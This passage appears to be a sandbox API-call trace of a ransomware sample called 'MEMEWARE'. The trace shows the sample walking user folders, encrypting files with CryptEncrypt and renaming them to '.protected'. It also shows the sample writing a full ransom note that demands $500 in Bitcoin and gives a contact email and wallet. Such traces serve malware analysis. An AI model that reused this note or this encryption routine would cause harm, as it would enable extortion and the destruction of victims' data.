wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\RESTORE_FILES.txt") returned 50 [0095.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\saved games\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.438] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.438] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.439] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.439] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.439] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.439] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.439] CloseHandle (hObject=0xa4) returned 1 [0095.439] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="Windows") returned -1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="Program Files") returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="Program Files (x86)") returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="$Recycle.bin") returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="System Volume Information") returned -1 [0095.439] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches") returned 29 [0095.439] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0095.439] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0095.439] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\*") returned 31 [0095.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.440] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.440] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.440] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.441] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.441] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\.") returned 31 [0095.441] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.441] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.441] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.441] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.441] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\." (normalized: "c:\\users\\default\\searches\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.441] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.441] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.441] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.441] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.441] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.441] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\..") returned 32 [0095.441] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.441] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.441] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.441] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.441] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.441] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.441] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.441] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.441] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.441] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.441] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.442] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.442] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.442] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.442] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.442] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.442] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.442] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0095.443] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.443] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0095.443] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.443] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.443] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.443] CloseHandle (hObject=0xb4) returned 1 [0095.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.protected") returned 51 [0095.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.protected" (normalized: "c:\\users\\default\\searches\\desktop.ini.protected")) returned 1 [0095.444] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Windows") returned -1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files") returned -1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files (x86)") returned -1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="$Recycle.bin") returned 1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="System Volume Information") returned -1 [0095.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0095.444] StrStrIW (lpFirst="Everywhere.search-ms", lpSrch=".protected") returned 0x0 [0095.444] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.444] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Windows") returned -1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files") returned -1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files (x86)") returned -1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="$Recycle.bin") returned 1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="System Volume Information") returned -1 [0095.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0095.444] StrStrIW (lpFirst="Indexed Locations.search-ms", lpSrch=".protected") returned 0x0 [0095.444] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.444] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.444] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\RESTORE_FILES.txt") returned 47 [0095.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\searches\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.445] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.445] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.446] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.446] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.446] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.446] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.446] CloseHandle (hObject=0xa4) returned 1 [0095.446] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="Windows") returned -1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="Program Files") returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="Program Files (x86)") returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="$Recycle.bin") returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="System Volume Information") returned -1 [0095.446] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo") returned 27 [0095.446] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0095.446] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0095.446] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo\\*") returned 29 [0095.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.446] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="Windows") returned -1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files") returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files (x86)") returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="$Recycle.bin") returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="System Volume Information") returned -1 [0095.446] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu") returned 31 [0095.446] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0095.446] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0095.446] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu\\*") returned 33 [0095.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.446] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.446] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="Program Files") returned 1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0095.447] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates") returned 30 [0095.447] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0095.447] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0095.447] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates\\*") returned 32 [0095.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.447] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="Windows") returned -1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="Program Files") returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="Program Files (x86)") returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="$Recycle.bin") returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="System Volume Information") returned 1 [0095.447] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos") returned 27 [0095.447] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0095.447] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0095.447] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\*") returned 29 [0095.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.447] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.447] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.447] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.447] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.447] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.447] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\.") returned 29 [0095.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.447] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.447] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.447] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.447] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\." (normalized: "c:\\users\\default\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.448] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.448] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.448] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.448] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.448] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.448] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.448] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\..") returned 30 [0095.448] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.448] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.448] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.448] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.448] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.448] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.448] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.448] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 